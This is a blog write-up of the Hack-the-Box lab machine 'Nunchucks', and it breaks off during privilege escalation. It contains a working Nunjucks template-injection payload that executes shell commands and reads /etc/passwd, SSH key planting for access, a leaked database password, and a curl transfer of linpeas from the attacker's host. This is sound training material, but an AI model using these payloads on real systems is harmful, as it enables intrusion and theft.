
<!DOCTYPE html>
<html lang="en">
<head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>

    
    <meta name="generator" content="Hugo 0.136.5">
    <meta name="date" content="">

    
    <meta charset="utf-8">
    <meta name="HandheldFriendly" content="True">
    <meta name="MobileOptimized" content="6000">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="referrer" content="no-referrer">
    <meta name="theme-color" content="#c8c3bc">

    
    <meta name="author" content="Felix Schaefer">
    <meta name="description" content="This is the academic biographical website of F. Schaefer!" />
    
        <meta name="keywords" content="academic, biographical, cyber security, computer science, research" />
    

    
    
        <title>&nbsp;•&nbsp;Hack-the-box writeup Nunchucks</title>
    

    
    <meta property="og:title" content="" />
    <meta property="og:type" content="website" />
    <meta property="og:description" content="This is the academic biographical website of F. Schaefer!" />

    
    <meta name="twitter:title" content="" />

    
    <link rel="canonical" href="http://localhost:1313/posts/htb-nunchucks/">
    
    
    <link rel="apple-touch-icon" sizes="180x180" href="/favicon/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon/favicon-16x16.png">
    <link rel="manifest" href="/favicon/site.webmanifest">

    
    
    
    <link rel="stylesheet" href="http://localhost:1313/styles.2330bbd95b8ef2acf949397397b944b691c43ccdb8797d8056d406f5ca756647.css">

    
    

    
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
        <link rel="preload" href="https://fonts.googleapis.com/css2?family=Bree+Serif&display=swap" as="style" onload="this.onload=null;this.rel='stylesheet'">
        <noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Bree+Serif&display=swap"></noscript>
    
    
        <link rel="preload" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,700&display=swap" as="style" onload="this.onload=null;this.rel='stylesheet'">
        <noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,700&display=swap"></noscript>
    

    
    
        <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css" integrity="sha512-KfkfwYDsLkIlwQp6LFnl8zNdLGxu9YAA1QvwINks4PhcElQSvqcyVLLD9aMhXd13uQjoXtEKNosOWaZqXgel0g==" crossorigin="anonymous" as="style" onload="this.onload=null;this.rel='stylesheet'">
        <noscript><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css" integrity="sha512-KfkfwYDsLkIlwQp6LFnl8zNdLGxu9YAA1QvwINks4PhcElQSvqcyVLLD9aMhXd13uQjoXtEKNosOWaZqXgel0g==" crossorigin="anonymous" referrerpolicy="no-referrer" /></noscript>
    

    
    
        <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/academicons/1.9.2/css/academicons.min.css" integrity="sha512-KlJCpRsLf+KKu2VQa5vmRuClRFjxc5lXO03ixZt82HZUk41+1I0bD8KBSA0fY290ayMfWYI9udIqeOWSu1/uZg==" crossorigin="anonymous" as="style" onload="this.onload=null;this.rel='stylesheet'">
        <noscript><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/academicons/1.9.2/css/academicons.min.css" integrity="sha512-KlJCpRsLf+KKu2VQa5vmRuClRFjxc5lXO03ixZt82HZUk41+1I0bD8KBSA0fY290ayMfWYI9udIqeOWSu1/uZg==" crossorigin="anonymous" referrerpolicy="no-referrer" /></noscript>
    

</head>
<body>

        <div class="outer">
            <div class="middle">
                <div class="inner">
<header>
    <a href="/" class="title"></a>    
</header>


<nav>
    <ul>
    
        <li><strong><a href="/">Home</a></strong></li>
    
        <li><strong><a href="/about">About</a></strong></li>
    
        <li><strong><a href="/posts/">Posts</a></strong></li>
    
    </ul>
</nav>

<main>
                        
    
<article class="post">

    
<h1><a href="http://localhost:1313/posts/htb-nunchucks/">Hack-the-box writeup Nunchucks</a></h1>


    <time datetime="2023-05-08">Published on May 8, 2023</time>


    <p>This is a write up for the hack-the-box challenge box <code>Nunchucks</code>. This time with real commands copy while working at the challenge. Next time we try do do screenshots as well.</p>
<h2 id="finding-a-attack-surface">Finding a attack surface</h2>
<h3 id="port-scan">Port scan</h3>
<p>We once again started with a <code>nmap</code> port scan to find open ports and services that can be used to find a attack angle.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span>╰─❯ sudo <span style="color:#a6e22e">nmap</span> <span style="color:#a6e22e">-sC</span> <span style="color:#a6e22e">-sV</span> <span style="color:#ae81ff">10</span>.<span style="color:#ae81ff">10</span>.<span style="color:#ae81ff">11</span>.<span style="color:#ae81ff">122</span> <span style="color:#a6e22e">-Pn</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Starting</span> Nmap <span style="color:#ae81ff">7</span>.<span style="color:#ae81ff">93</span> <span style="color:#f92672">(</span> <span style="color:#a6e22e">https</span>://nmap.org <span style="color:#f92672">)</span> at <span style="color:#ae81ff">2023</span>-<span style="color:#ae81ff">05</span>-<span style="color:#ae81ff">04</span> <span style="color:#ae81ff">14</span>:<span style="color:#ae81ff">35</span> CEST
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Stats</span>: <span style="color:#ae81ff">0</span>:<span style="color:#ae81ff">00</span>:<span style="color:#ae81ff">17</span> elapsed; <span style="color:#a6e22e">0</span> hosts completed <span style="color:#f92672">(</span><span style="color:#a6e22e">1</span> up<span style="color:#f92672">)</span>, <span style="color:#ae81ff">1</span> undergoing Service Scan
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Service</span> scan Timing: About <span style="color:#ae81ff">66</span>.<span style="color:#ae81ff">67</span>% done; <span style="color:#a6e22e">ETC</span>: <span style="color:#ae81ff">14</span>:<span style="color:#ae81ff">36</span> <span style="color:#f92672">(</span><span style="color:#a6e22e">0</span>:<span style="color:#ae81ff">00</span>:<span style="color:#ae81ff">06</span> remaining<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Nmap</span> scan report for <span style="color:#ae81ff">10</span>.<span style="color:#ae81ff">10</span>.<span style="color:#ae81ff">11</span>.<span style="color:#ae81ff">122</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Host</span> is up <span style="color:#f92672">(</span><span style="color:#a6e22e">0</span>.082s latency<span style="color:#f92672">)</span>.
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Not</span> shown: <span style="color:#ae81ff">997</span> closed tcp ports <span style="color:#f92672">(</span><span style="color:#a6e22e">reset</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">PORT</span>    STATE SERVICE  VERSION
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">22</span>/tcp  open  ssh      OpenSSH <span style="color:#ae81ff">8</span>.2p1 Ubuntu 4ubuntu0.<span style="color:#ae81ff">3</span> <span style="color:#f92672">(</span><span style="color:#a6e22e">Ubuntu</span> Linux; <span style="color:#a6e22e">protocol</span> <span style="color:#ae81ff">2</span>.<span style="color:#ae81ff">0</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span> <span style="color:#a6e22e">ssh-hostkey</span>: 
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span>   <span style="color:#a6e22e">3072</span> 6c146dbb7459c3782e48f511d85b4721 <span style="color:#f92672">(</span><span style="color:#a6e22e">RSA</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span>   <span style="color:#a6e22e">256</span> a2f42c427465a37c26dd497223827271 <span style="color:#f92672">(</span><span style="color:#a6e22e">ECDSA</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span><span style="color:#a6e22e">_</span>  <span style="color:#ae81ff">256</span> e18d44e7216d7c132fea3b8358aa02b3 <span style="color:#f92672">(</span><span style="color:#a6e22e">ED25519</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">80</span>/tcp  open  http     nginx <span style="color:#ae81ff">1</span>.<span style="color:#ae81ff">18</span>.<span style="color:#ae81ff">0</span> <span style="color:#f92672">(</span><span style="color:#a6e22e">Ubuntu</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span><span style="color:#a6e22e">_http-server-header</span>: nginx/<span style="color:#ae81ff">1</span>.<span style="color:#ae81ff">18</span>.<span style="color:#ae81ff">0</span> <span style="color:#f92672">(</span><span style="color:#a6e22e">Ubuntu</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span><span style="color:#a6e22e">_http-title</span>: Did not follow redirect to https://nunchucks.htb/
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">443</span>/tcp open  ssl/http nginx <span style="color:#ae81ff">1</span>.<span style="color:#ae81ff">18</span>.<span style="color:#ae81ff">0</span> <span style="color:#f92672">(</span><span style="color:#a6e22e">Ubuntu</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span><span style="color:#a6e22e">_ssl-date</span>: TLS randomness does not represent time
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span> <span style="color:#a6e22e">tls-nextprotoneg</span>: 
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span><span style="color:#a6e22e">_</span>  http/<span style="color:#ae81ff">1</span>.<span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span> <span style="color:#a6e22e">tls-alpn</span>: 
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span><span style="color:#a6e22e">_</span>  http/<span style="color:#ae81ff">1</span>.<span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span><span style="color:#a6e22e">_http-server-header</span>: nginx/<span style="color:#ae81ff">1</span>.<span style="color:#ae81ff">18</span>.<span style="color:#ae81ff">0</span> <span style="color:#f92672">(</span><span style="color:#a6e22e">Ubuntu</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span><span style="color:#a6e22e">_http-title</span>: Nunchucks <span style="color:#a6e22e">- Landing</span> Page
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span> <span style="color:#a6e22e">ssl-cert</span>: Subject: commonName<span style="color:#f92672">=</span>nunchucks.htb/organizationName<span style="color:#f92672">=</span>Nunchucks-Certificates/stateOrProvinceName<span style="color:#f92672">=</span>Dorset/countryName<span style="color:#f92672">=</span>UK
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span> <span style="color:#a6e22e">Subject</span> Alternative Name: DNS:localhost, DNS:nunchucks.htb
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span> <span style="color:#a6e22e">Not</span> valid before: <span style="color:#ae81ff">2021</span>-<span style="color:#ae81ff">08</span>-30T15:<span style="color:#ae81ff">42</span>:<span style="color:#ae81ff">24</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">|</span><span style="color:#a6e22e">_Not</span> valid after:  <span style="color:#ae81ff">2031</span>-<span style="color:#ae81ff">08</span>-28T15:<span style="color:#ae81ff">42</span>:<span style="color:#ae81ff">24</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Service</span> Info: OS: Linux; <span style="color:#a6e22e">CPE</span>: cpe:/o:linux:linux_kernel
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Service</span> detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Nmap</span> done: <span style="color:#ae81ff">1</span> IP address <span style="color:#f92672">(</span><span style="color:#a6e22e">1</span> host up<span style="color:#f92672">)</span> scanned in <span style="color:#ae81ff">21</span>.<span style="color:#ae81ff">06</span> seconds
</span></span></code></pre></div><blockquote>
<p><em>Node:</em> <code>╰─❯</code> is used to indicate the command used. Lines following the command are the repose.</p>
</blockquote>
<p>We found the following open services and ports that are interesting: <code>ssh:22</code>, <code>hhtp:80</code>, <code>ssl:443</code>. Also notable is the fact that the <code>http</code> website redirects to <code>https://nunchucks.htb/</code>.</p>
<h3 id="web-enumeration">Web enumeration</h3>
<p>Following this link directs us to a beautiful and completely random website. After a quick read we declared this website as useless. Most links are dead and the rest is only facade.</p>
<p>Next we used <code>gobuster</code> to enumerate possible subdirectories of the website</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span><span style="color:#a6e22e">gobuster</span> dir <span style="color:#a6e22e">--url</span> https://nunchucks.htb/
</span></span></code></pre></div><p>This did not respond with a good answer so after a while we canceled the process.
Meanwhile we started a search for subdomains. And indeed we found the subdomain <code>store.nuckus.htb</code> by running gobuster in <code>vhost</code> mode:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span>╰─❯ gobuster vhost <span style="color:#a6e22e">-w</span> /home/tim/pentest-library/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt <span style="color:#a6e22e">-u</span> https://nunchucks.htb/ <span style="color:#a6e22e">-k</span> <span style="color:#a6e22e">--append-domain</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">===============================================================</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Gobuster</span> v3.<span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">by</span> OJ Reeves <span style="color:#f92672">(</span>@TheColonial<span style="color:#f92672">)</span> <span style="color:#f92672">&amp;</span> Christian Mehlmauer <span style="color:#f92672">(</span>@firefart<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">===============================================================</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Url:             https://nunchucks.htb/
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Method:          GET
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Threads:         <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Wordlist:        /home/tim/pentest-library/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> User Agent:      gobuster/<span style="color:#ae81ff">3</span>.<span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Timeout:         10s
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Append Domain:   true
</span></span><span style="display:flex;"><span><span style="color:#f92672">===============================================================</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">2023</span>/<span style="color:#ae81ff">05</span>/<span style="color:#ae81ff">04</span> <span style="color:#ae81ff">14</span>:<span style="color:#ae81ff">48</span>:<span style="color:#ae81ff">19</span> Starting gobuster in VHOST enumeration mode
</span></span><span style="display:flex;"><span><span style="color:#f92672">===============================================================</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Found</span>: store.nunchucks.htb Status: <span style="color:#ae81ff">200</span> <span style="color:#f92672">[</span>Size: <span style="color:#ae81ff">4029</span><span style="color:#f92672">]</span>
</span></span></code></pre></div><blockquote>
<p><em>Note:</em> running gobuster in <code>dns</code> mode did not work. Even if <code>dns</code> mode is the intended mode for subdomain search.</p>
</blockquote>
<p>Next we added the subdomain to our <code>/etc/hosts</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span><span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#34;10.10.11.122 nunchucks.htb \n 10.10.11.122 store.nunchucks.htb&#34;</span> <span style="color:#f92672">&gt;</span> /etc/hosts
</span></span></code></pre></div><p>Visiting the website we where greeted by an other page that offers a form to enter an email to get information about a nunchucks store that will open soon. Suspiciously the website presented a string containing the entered email address after submitting. So we tried to enter a SSTI-string but the website checked if the entered string was a legit email address&hellip; client sided.</p>
<h2 id="sever-sided-template-injection-ssti">Sever sided template injection (SSTI)</h2>
<p>Using <code>burpsuit</code> we intercepted the web form and tried to inject some SSTI-packages. <code>{{7*7}}</code> is a good way to test for SSTI and indeed the website returned that our email address is <code>49</code>. We can deduct that this page is vulnerable to SSTI.</p>
<p>Next we needed to guess the used engine, as this box is named Nunchucks and there is a template engine named NUNJUCKS it seams as a quit good guess.
So we changed our &ldquo;email&rdquo; to a NUNJUCKS SSTI exploit string that should execute <code>tail /etc/passwd</code></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span><span style="color:#a6e22e">POST</span> /api/submit HTTP/<span style="color:#ae81ff">1</span>.<span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Host</span>: store.nunchucks.htb
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Cookie</span>: _csrf<span style="color:#f92672">=</span>QXBvLF8usqF663WVVx8AwZAX
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Content-Length</span>: <span style="color:#ae81ff">127</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Sec-Ch-Ua</span>: <span style="color:#e6db74">&#34;Not:A-Brand&#34;</span>;v<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;99&#34;</span>, <span style="color:#e6db74">&#34;Chromium&#34;</span>;v<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;112&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Sec-Ch-Ua-Platform</span>: <span style="color:#e6db74">&#34;Linux&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Sec-Ch-Ua-Mobile</span>: ?<span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">User-Agent</span>: Mozilla/<span style="color:#ae81ff">5</span>.<span style="color:#ae81ff">0</span> <span style="color:#f92672">(</span><span style="color:#a6e22e">Windows</span> NT <span style="color:#ae81ff">10</span>.<span style="color:#ae81ff">0</span>; <span style="color:#a6e22e">Win64</span>; <span style="color:#a6e22e">x64</span><span style="color:#f92672">)</span> AppleWebKit/<span style="color:#ae81ff">537</span>.<span style="color:#ae81ff">36</span> <span style="color:#f92672">(</span><span style="color:#a6e22e">KHTML</span>, like Gecko<span style="color:#f92672">)</span> Chrome/<span style="color:#ae81ff">112</span>.<span style="color:#ae81ff">0</span>.<span style="color:#ae81ff">5615</span>.<span style="color:#ae81ff">138</span> Safari/<span style="color:#ae81ff">537</span>.<span style="color:#ae81ff">36</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Content-Type</span>: application/json
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Accept</span>: */*
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Origin</span>: https://store.nunchucks.htb
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Sec-Fetch-Site</span>: same-origin
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Sec-Fetch-Mode</span>: cors
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Sec-Fetch-Dest</span>: empty
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Referer</span>: https://store.nunchucks.htb/
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Accept-Encoding</span>: gzip, deflate
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Accept-Language</span>: en-GB,en-US;q<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>.<span style="color:#ae81ff">9</span>,en;q<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>.<span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Connection</span>: close
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;email&#34;</span>:<span style="color:#e6db74">&#34;{{range.constructor(\&#34;return global.process.mainModule.require(&#39;child_process&#39;).execSync(&#39;tail /etc/passwd&#39;)\&#34;)()}}&#34;</span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>and there response is:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span><span style="color:#a6e22e">HTTP</span>/<span style="color:#ae81ff">1</span>.<span style="color:#ae81ff">1</span> <span style="color:#ae81ff">200</span> OK
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Server</span>: nginx/<span style="color:#ae81ff">1</span>.<span style="color:#ae81ff">18</span>.<span style="color:#ae81ff">0</span> <span style="color:#f92672">(</span><span style="color:#a6e22e">Ubuntu</span><span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Date</span>: Thu, <span style="color:#ae81ff">04</span> May <span style="color:#ae81ff">2023</span> <span style="color:#ae81ff">13</span>:<span style="color:#ae81ff">08</span>:<span style="color:#ae81ff">28</span> GMT
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Content-Type</span>: application/json; charset<span style="color:#f92672">=</span>utf-<span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Content-Length</span>: <span style="color:#ae81ff">744</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Connection</span>: close
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">X-Powered-By</span>: Express
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ETag</span>: W/<span style="color:#e6db74">&#34;2e8-J+TpLegq6Ei0sr/u8xxp/hXEqcY&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;response&#34;</span>:<span style="color:#e6db74">&#34;You will receive updates on the following email address: lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false\nrtkit:x:113:117:RealtimeKit,,,:/proc:/usr/sbin/nologin\ndnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\ngeoclue:x:115:120::/var/lib/geoclue:/usr/sbin/nologin\navahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin\ncups-pk-helper:x:117:123:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin\nsaned:x:118:124::/var/lib/saned:/usr/sbin/nologin\ncolord:x:119:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\npulse:x:120:126:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin\nmysql:x:121:128:MySQL Server,,,:/nonexistent:/bin/false\n.&#34;</span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>looks good.</p>
<h3 id="receiving-the-user-flag">Receiving the user flag</h3>
<p>Next we started copying our own sshkey to the known hosts. Therefore we executed the following commands though the before mentioned exploit.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span><span style="color:#a6e22e">mkdir</span> ~/.shh
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">echo</span> $SSHKEY <span style="color:#f92672">&gt;</span> ~/.shh/authorized_keys
</span></span></code></pre></div><p>and sshed form our attacker machine into the victim&rsquo;s system as the user david.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span><span style="color:#a6e22e">ssh</span> david@<span style="color:#ae81ff">10</span>.<span style="color:#ae81ff">10</span>.<span style="color:#ae81ff">11</span>.<span style="color:#ae81ff">122</span>
</span></span></code></pre></div><blockquote>
<p><em>Note:</em> the user david can be found in the response of the first exploit.</p>
</blockquote>
<p>getting the user flag is easy for this point on.</p>
<h2 id="privilege-escalation">Privilege escalation</h2>
<p>After gathering the user flag we now try to own the machine by opening the root flag.</p>
<h3 id="searching-for-the-setuid-bit">searching for the SETUID-bit</h3>
<p>Next we started searching for programs using the SETUID-bit to execute commands as root.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span><span style="color:#a6e22e">david</span>@nunchucks:~$ find / <span style="color:#a6e22e">-perm</span> /u<span style="color:#f92672">=</span>s <span style="color:#a6e22e">2</span><span style="color:#f92672">&gt;</span>/dev/null
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>/usr/bin/fusermount
</span></span><span style="display:flex;"><span>/usr/bin/umount
</span></span><span style="display:flex;"><span>/usr/bin/chsh
</span></span><span style="display:flex;"><span>/usr/bin/chfn
</span></span><span style="display:flex;"><span>/usr/bin/at
</span></span><span style="display:flex;"><span>/usr/bin/mount
</span></span><span style="display:flex;"><span>/usr/bin/gpasswd
</span></span><span style="display:flex;"><span>/usr/bin/newgrp
</span></span><span style="display:flex;"><span>/usr/bin/passwd
</span></span><span style="display:flex;"><span>/usr/bin/pkexec
</span></span><span style="display:flex;"><span>/usr/bin/su
</span></span><span style="display:flex;"><span>/usr/bin/sudo
</span></span><span style="display:flex;"><span>/usr/lib/policykit-<span style="color:#ae81ff">1</span>/polkit-agent-helper-<span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>/usr/lib/openssh/ssh-keysign
</span></span><span style="display:flex;"><span>/usr/lib/eject/dmcrypt-get-device
</span></span><span style="display:flex;"><span>/usr/lib/dbus-<span style="color:#ae81ff">1</span>.<span style="color:#ae81ff">0</span>/dbus-daemon-launch-helper
</span></span><span style="display:flex;"><span>/usr/sbin/pppd
</span></span></code></pre></div><p>Interesting, but nothing from it seems to be harmful or miss configured at first sight.</p>
<p>By the way we also found the credentials for the sql database in the <code>controllers/routs.js</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span><span style="color:#a6e22e">var</span> mysql      <span style="color:#f92672">=</span> require<span style="color:#f92672">(</span><span style="color:#e6db74">&#39;mysql&#39;</span><span style="color:#f92672">)</span>;
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">var</span> connection <span style="color:#f92672">=</span> mysql.createConnection<span style="color:#f92672">({</span>
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">host</span>     : <span style="color:#e6db74">&#39;localhost&#39;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">user</span>     : <span style="color:#e6db74">&#39;newsletter_admin&#39;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">password</span> : <span style="color:#e6db74">&#39;StoreNLetters2021&#39;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#a6e22e">database</span> : <span style="color:#e6db74">&#39;newsletters&#39;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">})</span>;
</span></span></code></pre></div><p>At this point we got stuck fo a bit as the programs with SETUID-bit where not that helpful.</p>
<h3 id="using-linpeessh-to-find-the-vulnerability">Using <code>linpees.sh</code> to find the vulnerability</h3>
<p>So we tried using <a href="%60https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS%60"><code>linpees.sh</code></a>. Its a collection of scripts searching for possible privilege escalation vectors.
We downloaded it form the <a href="https://github.com/carlospolop/PEASS-ng/releases/">git</a> and transferred it with a mini http sever to the victim&rsquo;s machine.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-fish" data-lang="fish"><span style="display:flex;"><span><span style="color:#a6e22e">htb</span>@attacker:
</span></span><span style="display:flex;"><span>╰─❯ curl https://github.com/carlospolop/PEASS-ng/releases/tag/<span style="color:#ae81ff">20230425</span>-bd7331ea/linpeas.sh <span style="color:#a6e22e">-o</span> linpeas.sh
</span></span><span style="display:flex;"><span>╰─❯ python3 <span style="color:#a6e22e">-m</span> http.server <span style="color:#ae81ff">8000</span> 
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">-----------------------------------------------------------------------------</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">david</span>@nunchucks:
</span></span><span style="display:flex;"><span>╰─❯ curl http://<span style="color:#ae81ff">10</span>.<span style="color:#ae81ff">10</span>.<span style="color:#ae81ff">16</span>.<span style="color:#ae81ff">3</span>:<span style="color:#ae81ff">8000</span>/linpeas.sh <span style="color:#a6e22e">-o</span> linpeas.sh
</span></span></code></pre></div><p>Utilizing <code>linpeas.sh</code> we found out that <code>perl</code> was running with <code>CAP_SETUID</code> capability set. Using <a href="https://gtfobins.github.io/">GTFOBins</a> we figured out that this could lead to a privilage escaplation.</p>
<blockquote>
<p><em>Note:</em> Afterwards we found out that using</p>
